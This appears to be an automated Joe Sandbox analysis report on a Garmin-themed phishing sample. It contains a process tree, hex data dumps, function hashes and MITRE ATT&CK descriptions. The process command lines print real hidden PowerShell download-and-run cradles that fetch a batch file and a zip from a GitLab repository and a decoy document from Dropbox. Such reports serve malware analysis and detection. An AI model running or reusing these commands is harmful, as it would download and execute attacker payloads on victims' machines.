2024-12-12 12:05:17 UTC	1369	IN	Data Raw: 0d 6e cd 49 40 b0 1f c1 16 5d 2e 7f b4 04 92 1b b7 46 6f 95 6a 9d 80 bf 97 0b 89 b2 a0 0a 47 bf 22 1b fc 64 39 35 ad 42 62 bd ef cf 24 1a f8 db a5 6a 87 59 2e 5e 6e c7 dd 6d a8 86 f9 9b d5 51 56 69 8f 5d fa ce da 7e ce 0f 08 77 9f 4d fa d1 d1 de 6a 4b fc ce 1f 89 46 f3 37 76 7e e6 77 90 3c 8e e8 42 ec d5 18 60 45 ed 2c 3b 87 74 0c 68 31 f3 e2 ae cd 7e dc ec bd 17 b0 72 a2 ec 5b ad d0 dd b7 17 e6 53 e7 4c 52 2c a4 f4 c6 5a 2b 49 83 08 ca 41 87 52 0b 1c 09 69 11 9c c3 cb 05 0f 09 73 c6 f7 29 59 42 a1 c1 63 82 0d 5e 08 03 5b 1e 73 0d f6 22 99 8d d7 41 10 f7 9c 38 93 90 f8 31 b4 3f 30 67 ed 3f f8 12 a8 9b c1 ff 8d 43 aa f3 0d ee 44 5e a4 fb 3e 80 d3 93 65 a2 9c 84 43 3a 47 f0 d0 05 a7 f4 19 0e 96 2c 1c 2c 77 e2 a8 c0 de 71 8d 14 70 1d 89 74 4a 7b 92 8f ca df Data Ascii: nI@].FojG"d95Bb$jY.^nmQVi]~wMjKF7v~w<B`E,;th1~r[SLR,Z+IARis)YBc^[s"A81?0g?CD^>eC:G,,wqptJ{
2024-12-12 12:05:17 UTC	1369	IN	Data Raw: 39 bb 0e aa bb 6d 1c 95 0d 08 76 d8 8d 97 49 87 f9 07 cb 3b be c3 85 12 26 78 38 94 8c ae 8c d3 bf 57 14 ba 37 c6 38 cf 5e e6 17 72 44 15 0d 6b 97 99 63 7e 7b a3 8a 2b b9 5b c8 39 2f 78 27 3e 7f 23 ce e7 76 f7 d7 c3 05 68 45 e1 5e 05 56 06 db 8f 40 2a 4e 0b 57 5c 66 f7 f4 a5 bc 8a 53 b9 46 c3 82 3e 40 69 10 a3 80 e7 1b 44 0e 0c fd d1 e4 14 d1 af 63 e7 8a 51 8d 1c 47 63 7a 86 86 c3 d2 30 40 de 67 c4 b2 e3 19 a8 7c 02 8c 6e 13 e2 71 c6 21 17 e0 85 1b 31 de 12 60 93 43 f0 01 29 2a 94 f3 57 e6 18 7f 2a 94 73 85 90 03 cc e2 c4 8b a9 58 ce 8b ee 53 50 4e 05 ca 79 12 cb 79 99 6b b3 c5 e9 55 a2 1d 8a 1b a7 88 37 b9 a7 bf d1 07 8b 3b 36 a4 b8 43 7a 29 2e b2 fe 77 1c 20 05 be 0c 55 8d d6 28 a4 c4 fd ba 4a 9c d0 5b 89 59 61 e9 5d 87 4e e8 1e 35 0d 25 9f e8 1f 88 e8 Data Ascii: 9mvI;&x8W78^rDkc~{+[9/x'>#vhE^V@NW\fSF>@iDcQGcz0@g\|nq!1`C)W*sXSPNyykU7;6Cz).w U(J[Ya]N5%
2024-12-12 12:05:17 UTC	1369	IN	Data Raw: 86 21 fa 3f c7 97 bb c9 90 3b e9 4a 16 52 87 f5 05 47 d1 25 0f b9 87 b0 11 f1 03 55 9c fc e1 72 44 ad eb 22 e4 30 62 70 2d 82 b8 17 71 e7 15 0a 36 1b a7 de 2d 78 06 78 70 19 3b 03 8c c2 2d 8f 64 f9 1d b4 9b eb 56 0f 02 97 7c f7 b4 75 d3 5d 3c e5 0e 64 7e 19 d9 b0 0b c3 4b 36 7e c0 55 1a c1 6b 5b ab f6 ab 7b d9 98 bf ea 5e 46 7a e0 40 74 67 38 b6 d5 ab 66 5c 6c 4e 4a 35 50 1c da 94 fd e4 d3 d1 5d 9b ac 2f 00 e1 e5 5f 2d 78 ae c1 dd 2b 8d e0 19 2e d5 00 e6 a1 fb 02 c7 70 fb e2 43 72 14 24 23 1a 9e 83 57 1e 94 7c 9c 72 59 aa 5d 6a ba 3b 2a 6f fa 02 cf 20 c3 70 23 bf bf fc 68 74 f0 b0 e1 d7 d1 38 21 fd 83 d3 a5 7d 78 4d 0a a2 3a e9 b1 c1 00 92 95 d3 33 96 96 30 f2 46 72 b0 69 24 3b 27 21 cc 4d 3e a5 12 af be 4d c2 f6 c9 ed c9 47 9d 52 03 36 6d 1f e4 6d 22 10 Data Ascii: !?;JRG%UrD"0bp-q6-xxp;-dV\|u]<d~K6~Uk[{^Fz@tg8f\lNJ5P]/_-x+.pCr$#W\|rY]j;*o p#ht8!}xM:30Fri$;'!M>MGR6mm"
2024-12-12 12:05:17 UTC	1369	IN	Data Raw: ba d7 90 0c 96 ac a6 e4 33 f6 e4 33 e9 89 75 5b 4d a2 39 f9 68 ea c0 d5 d7 09 de 39 7a c9 0a 75 ab 2a 0e 97 54 00 56 47 2b 7b 04 77 b5 c1 3c b0 24 ce ff a5 b4 07 1a 43 72 d6 19 60 5d 0a 93 0a ea a2 fd 1a 9b e4 c3 76 13 a4 4f cc 37 94 2c 14 94 1a a1 fa 94 56 d0 7c 2a a5 fd 00 2d 54 9c 4a 5b ad 64 32 f0 76 a2 ce 66 4e 14 27 a3 c1 7c ef 25 31 c1 6d e6 5c 83 70 2c ae f5 de a2 fa a7 ca 8a 17 9e 6d d0 b2 e9 9a 3a ab d2 14 28 7a f1 bf 76 a8 b8 a0 28 09 ca 91 dc 0b b0 24 54 8e a4 fb de 48 1c 12 5b a6 d0 be 4f 92 ae bb 6f 98 8a dc de 97 7c 76 ef 46 7a 9f eb 04 70 4d 76 e9 90 5d 3a 66 27 77 5a 6f 0c 5e 62 35 8b 6d fc 76 0d 6d 7b 77 47 b6 98 e4 ee 28 46 e9 8a 35 b0 fe 18 b5 c1 45 f0 d0 37 a4 35 71 ef fd 5d 95 06 a6 52 8c 55 ea b4 46 b5 fa f5 ef 46 e0 91 c6 21 35 a6 Data Ascii: 33u[M9h9zuTVG+{w<$Cr`]vO7,V\|-TJ[d2vfN'\|%1m\p,m:(zv($TH[Oo\|vFzpMv]:f'wZo^b5mvm{wG(F5E75q]RUFF!5

Target ID:	0
Start time:	07:04:58
Start date:	12/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c powershell -Command "$h='https://gitlab.com/stare2/garmin/-/raw/main/garsukhjdf11.bat'; $p=$env:TEMP+'\Updates.bat'; iwr $h -OutFile $p;start $p"
Imagebase:	0x7ff7b4990000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	07:04:58
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:04:58
Start date:	12/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "$h='https://gitlab.com/stare2/garmin/-/raw/main/garsukhjdf11.bat'; $p=$env:TEMP+'\Updates.bat'; iwr $h -OutFile $p;start $p"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:05:04
Start date:	12/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Updates.bat" "
Imagebase:	0x7ff7b4990000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AbobusObfuscator, Description: Yara detected Abobus Obfuscator, Source: 00000004.00000003.2169984727.000001E801303000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	07:05:04
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	07:05:04
Start date:	12/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp.com 437
Imagebase:	0x7ff7b1960000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	07:05:04
Start date:	12/12/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find
Imagebase:	0x7ff721da0000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	07:05:04
Start date:	12/12/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /L /I set "C:\Users\user\AppData\Local\Temp\Updates.bat"
Imagebase:	0x7ff7b6880000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	07:05:04
Start date:	12/12/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /L /I goto "C:\Users\user\AppData\Local\Temp\Updates.bat"
Imagebase:	0x7ff7b6880000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	07:05:04
Start date:	12/12/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /L /I echo "C:\Users\user\AppData\Local\Temp\Updates.bat"
Imagebase:	0x7ff7b6880000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	07:05:04
Start date:	12/12/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /L /I pause "C:\Users\user\AppData\Local\Temp\Updates.bat"
Imagebase:	0x7ff7b6880000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	07:05:04
Start date:	12/12/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find
Imagebase:	0x7ff721da0000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	07:05:05
Start date:	12/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c type tmp
Imagebase:	0x7ff7b4990000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	07:05:05
Start date:	12/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c type tmp
Imagebase:	0x7ff7b4990000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	07:05:05
Start date:	12/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	07:05:12
Start date:	12/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx'"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	07:05:13
Start date:	12/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/stare2/garmin/-/raw/main/fuknew1112.zip', 'C:\Users\Public\Document.zip')"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 00007FFD349809CD Relevance: 1.8, Strings: 1, Instructions: 547COMMON

Download Yara Rule

Strings

.@_H, xrefs: 00007FFD34980E61

Memory Dump Source

Source File: 0000000F.00000002.2245404241.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34980000_powershell.jbxd

Similarity

API ID:
String ID: .@_H
API String ID: 0-1410794216
Opcode ID: c9ef5c3246068097ad73a7dd614727a16c9f247982db9c1984c949a8813db864
Instruction ID: 74305f3114786223fce9dbceefda859fe04a79615ddcbbd242e1088be46b4ed9
Opcode Fuzzy Hash: c9ef5c3246068097ad73a7dd614727a16c9f247982db9c1984c949a8813db864
Instruction Fuzzy Hash: 8AF15A22A0EBC91FE796972C5CA55A63FE0EF57214F0A01FFE189C71D7E9189805C361

Function 00007FFD34980C89 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2245404241.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21178eadd223adc6e165cdfd88fa0ded05f7c9efa6bd6795ab2c88a308d431d9
Instruction ID: c0d6bac6f4ff04a44beac5133c206f6519492d2fd1b63d297b503cd7181512ed
Opcode Fuzzy Hash: 21178eadd223adc6e165cdfd88fa0ded05f7c9efa6bd6795ab2c88a308d431d9
Instruction Fuzzy Hash: 15417952A0E7C11FE39797381CB56A43FA1AF43254F1E40EBE589CA1E7D81D584AD322

Function 00007FFD34983734 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2245404241.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69b920ac814a1263c28fc7cd3901856886e50e234d089db2ac5911e50f51d77f
Instruction ID: feb7a2fcd7f88bf2b5686dcf6c86231f910699926e52952c028ea30f563744a3
Opcode Fuzzy Hash: 69b920ac814a1263c28fc7cd3901856886e50e234d089db2ac5911e50f51d77f
Instruction Fuzzy Hash: F0412832B0D6494FEBA5DB5C94A16B9B7D1EF9A310F1801BFC14DC7187DA2AE805C360

Function 00007FFD34980B44 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2245404241.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 692904b1387cd0ff4adb2c51981cae3af3cfc06eb7d886aea5a76c4e7b577e6f
Instruction ID: 89c6aac0db2bd7b3a637891c86cd040c9aea71752ed9f8727f889bced833be4f
Opcode Fuzzy Hash: 692904b1387cd0ff4adb2c51981cae3af3cfc06eb7d886aea5a76c4e7b577e6f
Instruction Fuzzy Hash: 5101B532F0EB464FEBA9A65C54A61B872D1FF8625575500BEE14DC31A7DD2EAC059200

Function 00007FFD3498375A Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2245404241.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b48e9a6e09d7a3d4712ff8bcb570fec59950420fbfac68fd05ef74f52e67a486
Instruction ID: cfb4a5281a6ec43a9c5460a9a12c31e43f2003a2276d1d4de738bf1f3b9cb2a0
Opcode Fuzzy Hash: b48e9a6e09d7a3d4712ff8bcb570fec59950420fbfac68fd05ef74f52e67a486
Instruction Fuzzy Hash: 99110871F0E6894FEBA5DB5C80A46BD7BD1EF9E210B1400BEC54DC7187CA2AD845C360

Function 00007FFD348B4195 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2245055435.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd348b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
Instruction ID: 5e2e1d49d45fb6b89b0fa391f2236679d183cf699ff5fb0ffebb47dcbf80b9fa
Opcode Fuzzy Hash: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
Instruction Fuzzy Hash: 6401A73020CB0C4FD744EF4CE051AA5B3E0FB99320F10052DE58AC3665DA36E881CB41

Non-executed Functions

Function 00007FFD349820CE Relevance: 2.9, Strings: 2, Instructions: 382COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD3498215C
, xrefs: 00007FFD34982188

Memory Dump Source

Source File: 0000000F.00000002.2245404241.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34980000_powershell.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: f37f9ae7a410ffd875437a31d7d423f0a71ddd37ad5978da0d358ee97681cddd
Instruction ID: f52b90282f526eabdfc32a3be5d3954bd44e3ac3316000b437bb3c65b24f89ca
Opcode Fuzzy Hash: f37f9ae7a410ffd875437a31d7d423f0a71ddd37ad5978da0d358ee97681cddd
Instruction Fuzzy Hash: 6DC1D262A0E7C50FE797877888B55A47FE1AF57220B0D05EFD588CB0E3D90D584AD362

Function 00007FFD348B24CA Relevance: .4, Instructions: 420COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2245055435.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd348b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d50701b6ebd9043a8d7686ca9e0c9f3e71d0d9f7141921ed02aaa9d676184a9
Instruction ID: b99430d0754133fbd87740499bccf1c7370662892310df504372a37e45d7d666
Opcode Fuzzy Hash: 9d50701b6ebd9043a8d7686ca9e0c9f3e71d0d9f7141921ed02aaa9d676184a9
Instruction Fuzzy Hash: BBD1A153A0E7C21FE313976C58BA0D57FA0EF5326574901FBC694CB093EE4D580AA7A2

Function 00007FFD348B6321 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2245055435.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd348b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0f177f223dcecedbd4f8f36baaa900cec7b5fb634998456cb95382e41fb96a0
Instruction ID: 5df30dbb25295b6e0296cbb709679fcbef03ff8c23718dc8612887e62cf4d268
Opcode Fuzzy Hash: b0f177f223dcecedbd4f8f36baaa900cec7b5fb634998456cb95382e41fb96a0
Instruction Fuzzy Hash: 22517F46A4D7C21FE722577C18B60EA7FA4DE5326570D01F7D6C4DA0A3ED4D280B92A3

Analysis Process: powershell.exePID: 6520, Parent PID: 4176COMMON

Executed Functions

Function 00007FFD34970B44 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.3384270515.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd34970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a06e973f4da70629800ca5b02bdeccb9776582b81d6b64eb31b51171ba7ecd10
Instruction ID: 925fab686234e65915af8151c40f87683f78f7b11f80fe27edcb5ee854f4ffce
Opcode Fuzzy Hash: a06e973f4da70629800ca5b02bdeccb9776582b81d6b64eb31b51171ba7ecd10
Instruction Fuzzy Hash: 8D01F532F0EA454FEBA9A66C68A60B877D1FF8621474440BEE10DC31E7DD2EEC059300

Function 00007FFD348A4195 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.3383749227.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd348a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
Instruction ID: ac2d810c59955261843366b53e95bb729000ce64e369491d2d45a9d3b852a5e8
Opcode Fuzzy Hash: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
Instruction Fuzzy Hash: 1A01677121CB0C8FDB44EF4CE451AA5B7E0FB99364F10056DE58AC3655D636E882CB45

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
